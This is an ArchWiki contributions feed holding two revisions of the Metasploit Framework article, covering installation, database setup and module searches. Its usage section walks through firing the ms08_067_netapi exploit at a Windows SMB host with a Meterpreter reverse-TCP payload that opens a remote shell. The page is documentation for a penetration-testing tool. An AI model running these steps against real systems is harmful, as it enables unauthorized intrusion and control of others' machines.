https://wiki.archlinux.org/api.php?action=feedcontributions&user=Jakkin&feedformat=atomArchWiki - User contributions [en]2024-03-28T11:11:06ZUser contributionsMediaWiki 1.41.0https://wiki.archlinux.org/index.php?title=Metasploit_Framework&diff=457033Metasploit Framework2016-11-18T00:42:19Z<p>Jakkin: see previous edit</p>
<hr />
<div>[[Category:Networking]]<br />
[[Category:Security]]<br />
[[ja:Metasploit Framework]]<br />
[[ru:Metasploit Framework]]<br />
{{Expansion|Meterpreter; More/better SQL search examples; More commands; Module development;}}<br />
<br />
From [http://www.offensive-security.com/metasploit-unleashed/Introduction the official site]:<br />
:''Consider the MSF to be one of the single most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins. The Metasploit Framework provides a truly impressive work environment. The MSF is far more than just a collection of exploits, it's an infrastructure that you can build upon and utilize for your custom needs. This allows you to concentrate on your unique environment, and not have to reinvent the wheel.''<br />
<br />
Currently, Metasploit requires to setup and configure Postgresql on target system to work.<br />
This wiki will show how to get metasploit working with a Postgresql database.<br />
<br />
== Installation ==<br />
<br />
Install package {{Pkg|metasploit}} from the official repositories. Note that you will have to follow the RVM setup instructions below for it to be able to function properly.<br />
<br />
For latest development version, install {{AUR|metasploit-git}} instead.<br />
<br />
=== Armitage ===<br />
<br />
[http://www.fastandeasyhacking.com/ Armitage] is a GUI front end for metasploit written in Java; it can be installed with the {{AUR|armitage}} package.<br />
<br />
When running Armitage, [[#Setting up the database]] is not optional, and must be followed. It is also mandatory to use a {{ic|~/.msf4/database.yml}} file.<br />
<br />
A sample {{ic|database.yml}} file is packaged as {{ic|/usr/share/metasploit/database.yml.sample}}.<br />
<br />
=== RVM ===<br />
<br />
Msfconsole requires [[Ruby]] and some [[Ruby#RubyGems]] to run without error.<br />
<br />
Follow the [[RVM#Installing RVM]] and [[RVM#Using RVM]] articles to install and use Ruby version 2.3.1 and set it to default.<br />
<br />
Once complete, source the newly created RVM installation:<br />
<br />
$ source ~/.rvm/scripts/rvm<br />
<br />
and install all gems necessary to run Msfconsole using [[Ruby#Bundler]]:<br />
<br />
$ gem install bundler<br />
<br />
$ bundle install<br />
<br />
{{Note|Using a version of Ruby older than 2.3.1 will result in the failure to install the {{ic|metasploit-concern}} gem.}}<br />
<br />
== Setting up the database ==<br />
<br />
{{Note|Commands which must be run from {{ic|msfconsole}} will be prefixed with {{ic|msf >}} in this article.}}<br />
<br />
Metasploit can be used without a database, but cache operations like searching would be very slow. This section shows how to set up Metasploit with ''Postgresql'' database server.<br />
<br />
{{Note|If you are using the [[#Armitage]] front-end, the database is mandatory.}}<br />
<br />
Follow the [[PostgreSQL]] article and create a new database called {{ic|msf}}. Any database name can be used, but this article will follow {{ic|msf}}.<br />
<br />
Start {{ic|msfconsole}} and type:<br />
<br />
msf > db_connect ''user''@msf<br />
<br />
where ''user'' is the database owner's name (usually your linux user's name).<br />
<br />
Rebuild the database cache:<br />
<br />
msf > db_rebuild_cache<br />
<br />
Metasploit will rebuild the cache in the background, and you can continue running commands meanwhile.<br />
<br />
{{Tip|It might take a few minutes to rebuild the cache the first time. Run {{ic|top}} or {{Pkg|htop}} to monitor the status of cache building. During the process, Ruby/Postgres/Metasploit processes will eat up 50% of CPU time.}}<br />
<br />
Currently Metasploit requires running the {{ic|db_connect}} command every time {{ic|msfconsole}} is started. To avoid typing that command every time, simply put this alias in your shell startup file, for example {{ic|~/.bashrc}}:<br />
<br />
alias msfconsole="msfconsole --quiet -x \"db_connect ${USER}@msf\""<br />
<br />
where the {{ic|quiet}} option will [[#Disable the ASCII banner on startup]], and the {{ic|-x}} command runs the given command right after startup.<br />
<br />
Another workaround for this is to create a {{ic|database.yml}} file in the {{ic|.msf4}} directory. For example:<br />
<br />
{{hc|~/.msf4/database.yml|<br />
production:<br />
adapter: postgresql<br />
database: msf<br />
username: ${USER}<br />
password: ${PASS}<br />
host: localhost<br />
port: 5432<br />
pool: 5<br />
timeout: 5<br />
}}<br />
<br />
{{Note|The database cache needs to be built only once. Later on upon startup, {{ic|msfconsole}} will say {{ic|[*] Rebuilding the module cache in the background...}}, but it will actually only update the changes. If no changes are made to the database, it will take only half a second.}}<br />
<br />
Run {{ic|db_status}} to verify that database connection is properly established:<br />
<br />
{{hc|msf > db_status|<br />
[*] postgresql connected to msf<br />
}}<br />
<br />
== Usage ==<br />
<br />
There are several interfaces available for Metasploit. This section will explain how to use {{ic|msfconsole}}, the interface that provides the most features available in MSF.<br />
<br />
To start it, simply type {{ic|msfconsole}}. The prompt will change to {{ic|msf >}} to indicate it is waiting for commands.<br />
<br />
{{Tip|Besides additional Metasploit commands explained below, all the regular shell commands and scripts found in {{ic|$PATH}} are available too! (except for aliases)}}<br />
<br />
=== Module types ===<br />
<br />
Everything (scripts, files, programs etc) in Metasploit is a module. There are 6 types of modules:<br />
<br />
* {{ic|auxiliary}} - Modules for helping the attacker in various tasks, like [[Nmap|port scanning]], version detection or network traffic analysis<br />
* {{ic|exploit}} - The code that takes advantage of a vulnerability and allows the execution of the payload, like triggering buffer overflow or bypassing authentication<br />
* {{ic|payload}} - The thing that has to be done right after a successful exploit, like establishing a remote connection, starting a meterpreter session or executing some shell commands<br />
* {{ic|post}} - Various programs that can be run after successful exploitation and remote connection, like collecting passwords, setting up keyloggers or downloading files<br />
* {{ic|encoder}} - Programs for performing encryption<br />
* {{ic|nop}} - ''NOP'' generators. ''NOP'' is an assembly language instruction which simply does nothing. The machine code of this instruction is different on each hardware architecture. ''NOP'' instructions are useful for filling the void in executables.<br />
<br />
=== Searching for exploits ===<br />
<br />
{{Note|Currently the {{ic|search}} command [[#Bugs|does not work properly]]. Refer to [[#Searching from the database]] for a workaround.}}<br />
<br />
To discover what operating system and software version a target runs, perform a [[Nmap|port scan]]. With this information, use the {{ic|search}} command to search for available exploits.<br />
<br />
For example, to search for all exploits on Linux platform of Novell:<br />
<br />
msf > search platform:linux type:exploit name:Novell<br />
<br />
To search for specific field, type its name, followed by column and the phrase. The following search fields are available:<br />
<br />
{| class="wikitable"<br />
! style=white-space:nowrap | Search field<br />
! style=white-space:nowrap | Matches<br />
! style=white-space:nowrap | Possible values<br />
! style=white-space:nowrap | DB table & column<br />
|-<br />
| {{ic|app}}<br />
| style=white-space:nowrap | Passive (client) or Active (server) exploits<br />
| {{ic|client}}, {{ic|server}}<br />
| style=white-space:nowrap | {{ic|module_details.stance}}<br />
|-<br />
| {{ic|author}}<br />
| style=white-space:nowrap | Name and email of module Author<br />
| Any phrase<br />
| style=white-space:nowrap | {{ic|module_authors.name}}<br />
|-<br />
| {{ic|type}}<br />
| style=white-space:nowrap | The [[#Module types|module type]]<br />
| {{ic|auxiliary}}, {{ic|exploit}}, {{ic|payload}}, {{ic|post}}, {{ic|encoder}}, {{ic|nop}}<br />
| style=white-space:nowrap | {{ic|module_details.mtype}}<br />
|-<br />
| {{ic|name}}<br />
| style=white-space:nowrap | The path (Name) and the short description<br />
| Any phrase<br />
| {{ic|module_details.fullname}}, {{ic|module_details.name}}<br />
|-<br />
| {{ic|platform}}<br />
| style=white-space:nowrap | The target hardware or software platform<br />
| {{ic|bsdi}}, {{ic|netware}}, {{ic|linux}}, {{ic|hpux}}, {{ic|irix}}, {{ic|osx}}, {{ic|bsd}}, {{ic|platform}}, {{ic|java}}, {{ic|javascript}}, {{ic|unix}}, {{ic|php}}, {{ic|firefox}}, {{ic|nodejs}}, {{ic|ruby}}, {{ic|cisco}}, {{ic|android}}, {{ic|aix}}, {{ic|windows}}, {{ic|python}}, {{ic|solaris}}<br />
| style=white-space:nowrap | {{ic|module_platforms.name}}<br />
|-<br />
| {{ic|bid}}, {{ic|cve}}, {{ic|edb}}, {{ic|osvdb}} or {{ic|ref}}<br />
| The [http://www.securityfocus.com/ Bugtraq], [http://www.cvedetails.com/ CVE], [http://www.exploit-db.com/ Exploit-DB], [http://www.osvdb.org/ OSBDB] ID or any<br />
| Exploit database entry ID, or a part of upstream report URL<br />
| style=white-space:nowrap | {{ic|module_refs.name}}<br />
|-<br />
| (No field)<br />
| All of the above except {{ic|app}} and {{ic|type}}<br />
| Any phrase<br />
| All of the above<br />
|}<br />
<br />
See [[#Searching from the database]] and [[#Database search examples]] for more advanced search queries.<br />
<br />
=== Using an exploit ===<br />
<br />
After choosing an appropriate exploit, it is time to start hacking!<br />
<br />
First, select an exploit using the {{ic|use}} command:<br />
<br />
msf > use exploit/windows/smb/ms08_067_netapi<br />
<br />
{{Note|{{ic|ms08_067_netapi}} is one of the most popular exploits affecting Windows XP and Windows Server 2003 SMB services. It was disclosed in 2008 and proves to be very reliable in exploiting unpatched systems which have firewalls disabled.}}<br />
<br />
To view information about a module, use the {{ic|info}} command:<br />
<br />
msf exploit(ms08_067_netapi) > info exploit/windows/smb/ms08_067_netapi<br />
<br />
Running {{ic|info}} without arguments will show info about currently selected module.<br />
<br />
To view the selected exploit's options, run:<br />
<br />
{{hc|msf exploit(ms08_067_netapi) > show options|<br />
Module options (exploit/windows/smb/ms08_067_netapi):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST yes The target address<br />
RPORT 445 yes Set the SMB service port<br />
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)<br />
<br />
...<br />
}}<br />
<br />
All the required fields must be provided before exploitation. Here, only the {{ic|RHOST}} variable must be specified. To assign a value to a variable use the {{ic|set}} command:<br />
<br />
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.102<br />
<br />
Now choose the payload:<br />
<br />
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp<br />
<br />
{{Note|Meterpreter is a command shell built into Metasploit and allows the attacker to run remote commands on exploited systems. Reverse TCP is technique when the exploited computer establishes a connection back to the computer it was exploited from.}}<br />
<br />
Choosing a payload (actually, choosing modules in general) will add more options. Run {{ic|show options}} again:<br />
<br />
{{hc|msf exploit(ms08_067_netapi) > show options|<br />
Module options (exploit/windows/smb/ms08_067_netapi):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST 192.168.56.102 yes The target address<br />
RPORT 445 yes Set the SMB service port<br />
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)<br />
<br />
Payload options (windows/meterpreter/reverse_tcp):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)<br />
LHOST yes The listen address<br />
LPORT 4444 yes The listen port<br />
}}<br />
<br />
Now assign {{ic|LHOST}} variable to the address of your computer, where the exploited computer will send connection requests to:<br />
<br />
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1<br />
<br />
Now launch the attack!<br />
<br />
msf exploit(ms08_067_netapi) > exploit<br />
<br />
If you are lucky, you will be dropped to a Meterpreter session where you can do anything on the remote computer.<br />
<br />
== Bugs ==<br />
<br />
=== Search does not filter properly ===<br />
<br />
Currently the {{ic|search}} command in {{ic|msfconsole}} does not properly filter the results if more than 1 filters are specified. See [https://github.com/rapid7/metasploit-framework/issues/3809 the bug report] for details.<br />
<br />
See [[#Searching from the database]] for a workaround.<br />
<br />
== Tips and tricks ==<br />
<br />
=== Searching from the database ===<br />
<br />
Since everything in Metasploit is stored in a database, it is easy to make powerful search queries without the need of the {{ic|search}} frontend command.<br />
<br />
To start the database interface, run:<br />
<br />
$ psql msf<br />
<br />
The information about modules is stored in 8 tables:<br />
<br />
{| class="wikitable"<br />
!Table Name<br />
!Contents<br />
|-<br />
|{{ic|module_details}}<br />
|The "main" table, describes various details of each module<br />
|-<br />
|{{ic|module_actions}}<br />
|The action names of ''auxiliary'' modules<br />
|-<br />
|{{ic|module_archs}}<br />
|The target hardware architecture or software platform<br />
|-<br />
|{{ic|module_authors}}<br />
|Names and emails of module author<br />
|-<br />
|{{ic|module_mixins}}<br />
|Empty (???)<br />
|-<br />
|{{ic|module_platforms}}<br />
|The target operating system. See also [[#Popularity of a platform by number of exploits]]<br />
|-<br />
|{{ic|module_refs}}<br />
|References to various online exploit databases and reports <br />
|-<br />
|{{ic|module_targets}}<br />
|The target program name and version of the ''exploit''<br />
|}<br />
<br />
{{Tip|To see what type of details (columns) a table contains, run {{ic|\d+ ''table_name''}}. For example: {{ic|\d+ module_details}}.}}<br />
<br />
Almost all tables have 3 columns: {{ic|id}}, {{ic|detail_id}} and {{ic|name}}, except for {{ic|module_details}} table which has 16 columns.<br />
<br />
The {{ic|detail_id}} values are pointers to the rows of {{ic|module_details}} table.<br />
<br />
To see the all the contents of a table, run:<br />
<br />
SELECT * FROM ''table_name'';<br />
<br />
Multiple:<br />
<br />
* Architecture<br />
* Platform<br />
* Target<br />
<br />
Module options:<br />
<br />
* module type<br />
* stance<br />
* privileged<br />
* path<br />
* name<br />
* refname<br />
* rank<br />
* privileged<br />
* disclosure date<br />
<br />
=== Database search examples ===<br />
<br />
The {{ic|module_details}} table contains multiple columns and viewing them all at once is not convenient. To show only basic information about the modules:<br />
<br />
SELECT id, mtype, refname, disclosure_date, rank, stance, name<br />
FROM module_details;<br />
<br />
Show some information about available modules, include platform information from {{ic|module_platforms}}:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id;<br />
<br />
Show all client (aggressive) exploits for Windows platform:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND stance = 'aggressive';<br />
<br />
Show all exploits for Windows platform with rank >= 500 disclosed after 2013:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND rank >= 500<br />
AND disclosure_date >= TIMESTAMP '2013-1-1';<br />
<br />
Show all aggressive (client) exploits for Windows platform with rank >= 500 and include additional information about module's target:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, module_details.name, DATE(disclosure_date), rank, module_targets.name as target<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id JOIN module_targets on module_details.id = module_targets.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND stance = 'aggressive'<br />
AND rank >= 500<br />
order by target;<br />
<br />
=== Popularity of a platform by number of exploits ===<br />
<br />
To view the possible {{ic|platform}} values, and number of available exploits, run from {{ic|psql}}:<br />
<br />
SELECT name, count(*)<br />
FROM module_platforms<br />
GROUP BY name<br />
ORDER BY count DESC;<br />
<br />
=== Disable the ASCII banner on startup ===<br />
<br />
To disable the banner, run {{ic|msfconsole}} with {{ic|-q}}/{{ic|--quiet}} argument:<br />
<br />
$ msfconsole --quiet<br />
<br />
=== Preserve variable values between sessions ===<br />
<br />
If you do not want the variables to reset when selecting another module and when rerunning {{ic|msfconsole}} then set it globally via {{ic|setg}}, for example:<br />
<br />
msf > setg RHOST 192.168.56.102<br />
<br />
== Troubleshooting ==<br />
<br />
=== Cannot click in VNC viewer ===<br />
<br />
If you selected VNC viewer as a payload, but are unable to click or do any actions, that means you forgot to set the {{ic|ViewOnly}} variable to false. To fix this problem, re-run the exploit with the variable set to {{ic|false}}:<br />
<br />
msf > set ViewOnly false<br />
<br />
=== cannot load such file -- robots (LoadError) ===<br />
<br />
If you get an error like this:<br />
<br />
~/metasploit-framework/lib/metasploit/framework.rb:19:in `require': cannot load such file -- robots (LoadError)<br />
from ~/metasploit-framework/lib/metasploit/framework.rb:19:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `require'<br />
from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `require'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `<top (required)>'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `const_get'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `block in constantize'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `each'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `constantize'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/core_ext/string/inflections.rb:54:in `constantize'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:73:in `parsed_options_class'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:69:in `parsed_options'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:47:in `require_environment!'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:81:in `start'<br />
from ./msfconsole:48:in `<main>'<br />
<br />
This happens because the file {{ic|robots.rb}} has incorrect permissions and can be read only by the root user (see [https://github.com/fizx/robots/issues/6 the bug report]):<br />
<br />
{{hc|$ ls -l /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib|<br />
total 4<br />
-rw-r----- 1 root root 3174 Oct 19 16:47 robots.rb<br />
}}<br />
<br />
To fix this, simply change the permission to be world-readable:<br />
<br />
# chmod o+r /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib/robots.rb<br />
<br />
=== db_connect fails silently ===<br />
<br />
If upon running {{ic|db_connect}} you see no output, but later getting a message like this:<br />
<br />
[!] Database not connected or cache not built, using slow search<br />
<br />
that probably means that the {{ic|postgresql}} service is not running.<br />
<br />
== See also ==<br />
<br />
* [http://www.offensive-security.com/metasploit-unleashed/Main_Page Metasploit Unleashed security training]<br />
* [https://github.com/rapid7/metasploit-framework/wiki Metasploit wiki on GitHub]<br />
* [http://en.wikibooks.org/wiki/Metasploit The Metasploit Book]</div>Jakkinhttps://wiki.archlinux.org/index.php?title=Metasploit_Framework&diff=457032Metasploit Framework2016-11-18T00:41:23Z<p>Jakkin: Updated Ruby version from 2.1.5 to 2.3.1. Metasploit no longer installs with 2.1.5.</p>
<hr />
<div>[[Category:Networking]]<br />
[[Category:Security]]<br />
[[ja:Metasploit Framework]]<br />
[[ru:Metasploit Framework]]<br />
{{Expansion|Meterpreter; More/better SQL search examples; More commands; Module development;}}<br />
<br />
From [http://www.offensive-security.com/metasploit-unleashed/Introduction the official site]:<br />
:''Consider the MSF to be one of the single most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins. The Metasploit Framework provides a truly impressive work environment. The MSF is far more than just a collection of exploits, it's an infrastructure that you can build upon and utilize for your custom needs. This allows you to concentrate on your unique environment, and not have to reinvent the wheel.''<br />
<br />
Currently, Metasploit requires to setup and configure Postgresql on target system to work.<br />
This wiki will show how to get metasploit working with a Postgresql database.<br />
<br />
== Installation ==<br />
<br />
Install package {{Pkg|metasploit}} from the official repositories. Note that you will have to follow the RVM setup instructions below for it to be able to function properly.<br />
<br />
For latest development version, install {{AUR|metasploit-git}} instead.<br />
<br />
=== Armitage ===<br />
<br />
[http://www.fastandeasyhacking.com/ Armitage] is a GUI front end for metasploit written in Java; it can be installed with the {{AUR|armitage}} package.<br />
<br />
When running Armitage, [[#Setting up the database]] is not optional, and must be followed. It is also mandatory to use a {{ic|~/.msf4/database.yml}} file.<br />
<br />
A sample {{ic|database.yml}} file is packaged as {{ic|/usr/share/metasploit/database.yml.sample}}.<br />
<br />
=== RVM ===<br />
<br />
Msfconsole requires [[Ruby]] and some [[Ruby#RubyGems]] to run without error.<br />
<br />
Follow the [[RVM#Installing RVM]] and [[RVM#Using RVM]] articles to install and use Ruby version 2.3.1 and set it to default.<br />
<br />
Once complete, source the newly created RVM installation:<br />
<br />
$ source ~/.rvm/scripts/rvm<br />
<br />
and install all gems necessary to run Msfconsole using [[Ruby#Bundler]]:<br />
<br />
$ gem install bundler<br />
<br />
$ bundle install<br />
<br />
{{Note|Using a version of Ruby older than 2.1.5 will result in the failure to install the {{ic|metasploit-concern}} gem.}}<br />
<br />
== Setting up the database ==<br />
<br />
{{Note|Commands which must be run from {{ic|msfconsole}} will be prefixed with {{ic|msf >}} in this article.}}<br />
<br />
Metasploit can be used without a database, but cache operations like searching would be very slow. This section shows how to set up Metasploit with ''Postgresql'' database server.<br />
<br />
{{Note|If you are using the [[#Armitage]] front-end, the database is mandatory.}}<br />
<br />
Follow the [[PostgreSQL]] article and create a new database called {{ic|msf}}. Any database name can be used, but this article will follow {{ic|msf}}.<br />
<br />
Start {{ic|msfconsole}} and type:<br />
<br />
msf > db_connect ''user''@msf<br />
<br />
where ''user'' is the database owner's name (usually your linux user's name).<br />
<br />
Rebuild the database cache:<br />
<br />
msf > db_rebuild_cache<br />
<br />
Metasploit will rebuild the cache in the background, and you can continue running commands meanwhile.<br />
<br />
{{Tip|It might take a few minutes to rebuild the cache the first time. Run {{ic|top}} or {{Pkg|htop}} to monitor the status of cache building. During the process, Ruby/Postgres/Metasploit processes will eat up 50% of CPU time.}}<br />
<br />
Currently Metasploit requires running the {{ic|db_connect}} command every time {{ic|msfconsole}} is started. To avoid typing that command every time, simply put this alias in your shell startup file, for example {{ic|~/.bashrc}}:<br />
<br />
alias msfconsole="msfconsole --quiet -x \"db_connect ${USER}@msf\""<br />
<br />
where the {{ic|quiet}} option will [[#Disable the ASCII banner on startup]], and the {{ic|-x}} command runs the given command right after startup.<br />
<br />
Another workaround for this is to create a {{ic|database.yml}} file in the {{ic|.msf4}} directory. For example:<br />
<br />
{{hc|~/.msf4/database.yml|<br />
production:<br />
adapter: postgresql<br />
database: msf<br />
username: ${USER}<br />
password: ${PASS}<br />
host: localhost<br />
port: 5432<br />
pool: 5<br />
timeout: 5<br />
}}<br />
<br />
{{Note|The database cache needs to be built only once. Later on upon startup, {{ic|msfconsole}} will say {{ic|[*] Rebuilding the module cache in the background...}}, but it will actually only update the changes. If no changes are made to the database, it will take only half a second.}}<br />
<br />
Run {{ic|db_status}} to verify that database connection is properly established:<br />
<br />
{{hc|msf > db_status|<br />
[*] postgresql connected to msf<br />
}}<br />
<br />
== Usage ==<br />
<br />
There are several interfaces available for Metasploit. This section will explain how to use {{ic|msfconsole}}, the interface that provides the most features available in MSF.<br />
<br />
To start it, simply type {{ic|msfconsole}}. The prompt will change to {{ic|msf >}} to indicate it is waiting for commands.<br />
<br />
{{Tip|Besides additional Metasploit commands explained below, all the regular shell commands and scripts found in {{ic|$PATH}} are available too! (except for aliases)}}<br />
<br />
=== Module types ===<br />
<br />
Everything (scripts, files, programs etc) in Metasploit is a module. There are 6 types of modules:<br />
<br />
* {{ic|auxiliary}} - Modules for helping the attacker in various tasks, like [[Nmap|port scanning]], version detection or network traffic analysis<br />
* {{ic|exploit}} - The code that takes advantage of a vulnerability and allows the execution of the payload, like triggering buffer overflow or bypassing authentication<br />
* {{ic|payload}} - The thing that has to be done right after a successful exploit, like establishing a remote connection, starting a meterpreter session or executing some shell commands<br />
* {{ic|post}} - Various programs that can be run after successful exploitation and remote connection, like collecting passwords, setting up keyloggers or downloading files<br />
* {{ic|encoder}} - Programs for performing encryption<br />
* {{ic|nop}} - ''NOP'' generators. ''NOP'' is an assembly language instruction which simply does nothing. The machine code of this instruction is different on each hardware architecture. ''NOP'' instructions are useful for filling the void in executables.<br />
<br />
=== Searching for exploits ===<br />
<br />
{{Note|Currently the {{ic|search}} command [[#Bugs|does not work properly]]. Refer to [[#Searching from the database]] for a workaround.}}<br />
<br />
To discover what operating system and software version a target runs, perform a [[Nmap|port scan]]. With this information, use the {{ic|search}} command to search for available exploits.<br />
<br />
For example, to search for all exploits on Linux platform of Novell:<br />
<br />
msf > search platform:linux type:exploit name:Novell<br />
<br />
To search for specific field, type its name, followed by column and the phrase. The following search fields are available:<br />
<br />
{| class="wikitable"<br />
! style=white-space:nowrap | Search field<br />
! style=white-space:nowrap | Matches<br />
! style=white-space:nowrap | Possible values<br />
! style=white-space:nowrap | DB table & column<br />
|-<br />
| {{ic|app}}<br />
| style=white-space:nowrap | Passive (client) or Active (server) exploits<br />
| {{ic|client}}, {{ic|server}}<br />
| style=white-space:nowrap | {{ic|module_details.stance}}<br />
|-<br />
| {{ic|author}}<br />
| style=white-space:nowrap | Name and email of module Author<br />
| Any phrase<br />
| style=white-space:nowrap | {{ic|module_authors.name}}<br />
|-<br />
| {{ic|type}}<br />
| style=white-space:nowrap | The [[#Module types|module type]]<br />
| {{ic|auxiliary}}, {{ic|exploit}}, {{ic|payload}}, {{ic|post}}, {{ic|encoder}}, {{ic|nop}}<br />
| style=white-space:nowrap | {{ic|module_details.mtype}}<br />
|-<br />
| {{ic|name}}<br />
| style=white-space:nowrap | The path (Name) and the short description<br />
| Any phrase<br />
| {{ic|module_details.fullname}}, {{ic|module_details.name}}<br />
|-<br />
| {{ic|platform}}<br />
| style=white-space:nowrap | The target hardware or software platform<br />
| {{ic|bsdi}}, {{ic|netware}}, {{ic|linux}}, {{ic|hpux}}, {{ic|irix}}, {{ic|osx}}, {{ic|bsd}}, {{ic|platform}}, {{ic|java}}, {{ic|javascript}}, {{ic|unix}}, {{ic|php}}, {{ic|firefox}}, {{ic|nodejs}}, {{ic|ruby}}, {{ic|cisco}}, {{ic|android}}, {{ic|aix}}, {{ic|windows}}, {{ic|python}}, {{ic|solaris}}<br />
| style=white-space:nowrap | {{ic|module_platforms.name}}<br />
|-<br />
| {{ic|bid}}, {{ic|cve}}, {{ic|edb}}, {{ic|osvdb}} or {{ic|ref}}<br />
| The [http://www.securityfocus.com/ Bugtraq], [http://www.cvedetails.com/ CVE], [http://www.exploit-db.com/ Exploit-DB], [http://www.osvdb.org/ OSBDB] ID or any<br />
| Exploit database entry ID, or a part of upstream report URL<br />
| style=white-space:nowrap | {{ic|module_refs.name}}<br />
|-<br />
| (No field)<br />
| All of the above except {{ic|app}} and {{ic|type}}<br />
| Any phrase<br />
| All of the above<br />
|}<br />
<br />
See [[#Searching from the database]] and [[#Database search examples]] for more advanced search queries.<br />
<br />
=== Using an exploit ===<br />
<br />
After choosing an appropriate exploit, it is time to start hacking!<br />
<br />
First, select an exploit using the {{ic|use}} command:<br />
<br />
msf > use exploit/windows/smb/ms08_067_netapi<br />
<br />
{{Note|{{ic|ms08_067_netapi}} is one of the most popular exploits affecting Windows XP and Windows Server 2003 SMB services. It was disclosed in 2008 and proves to be very reliable in exploiting unpatched systems which have firewalls disabled.}}<br />
<br />
To view information about a module, use the {{ic|info}} command:<br />
<br />
msf exploit(ms08_067_netapi) > info exploit/windows/smb/ms08_067_netapi<br />
<br />
Running {{ic|info}} without arguments will show info about currently selected module.<br />
<br />
To view the selected exploit's options, run:<br />
<br />
{{hc|msf exploit(ms08_067_netapi) > show options|<br />
Module options (exploit/windows/smb/ms08_067_netapi):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST yes The target address<br />
RPORT 445 yes Set the SMB service port<br />
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)<br />
<br />
...<br />
}}<br />
<br />
All the required fields must be provided before exploitation. Here, only the {{ic|RHOST}} variable must be specified. To assign a value to a variable use the {{ic|set}} command:<br />
<br />
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.102<br />
<br />
Now choose the payload:<br />
<br />
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp<br />
<br />
{{Note|Meterpreter is a command shell built into Metasploit and allows the attacker to run remote commands on exploited systems. Reverse TCP is technique when the exploited computer establishes a connection back to the computer it was exploited from.}}<br />
<br />
Choosing a payload (actually, choosing modules in general) will add more options. Run {{ic|show options}} again:<br />
<br />
{{hc|msf exploit(ms08_067_netapi) > show options|<br />
Module options (exploit/windows/smb/ms08_067_netapi):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST 192.168.56.102 yes The target address<br />
RPORT 445 yes Set the SMB service port<br />
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)<br />
<br />
Payload options (windows/meterpreter/reverse_tcp):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)<br />
LHOST yes The listen address<br />
LPORT 4444 yes The listen port<br />
}}<br />
<br />
Now assign {{ic|LHOST}} variable to the address of your computer, where the exploited computer will send connection requests to:<br />
<br />
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1<br />
<br />
Now launch the attack!<br />
<br />
msf exploit(ms08_067_netapi) > exploit<br />
<br />
If you are lucky, you will be dropped to a Meterpreter session where you can do anything on the remote computer.<br />
<br />
== Bugs ==<br />
<br />
=== Search does not filter properly ===<br />
<br />
Currently the {{ic|search}} command in {{ic|msfconsole}} does not properly filter the results if more than 1 filters are specified. See [https://github.com/rapid7/metasploit-framework/issues/3809 the bug report] for details.<br />
<br />
See [[#Searching from the database]] for a workaround.<br />
<br />
== Tips and tricks ==<br />
<br />
=== Searching from the database ===<br />
<br />
Since everything in Metasploit is stored in a database, it is easy to make powerful search queries without the need of the {{ic|search}} frontend command.<br />
<br />
To start the database interface, run:<br />
<br />
$ psql msf<br />
<br />
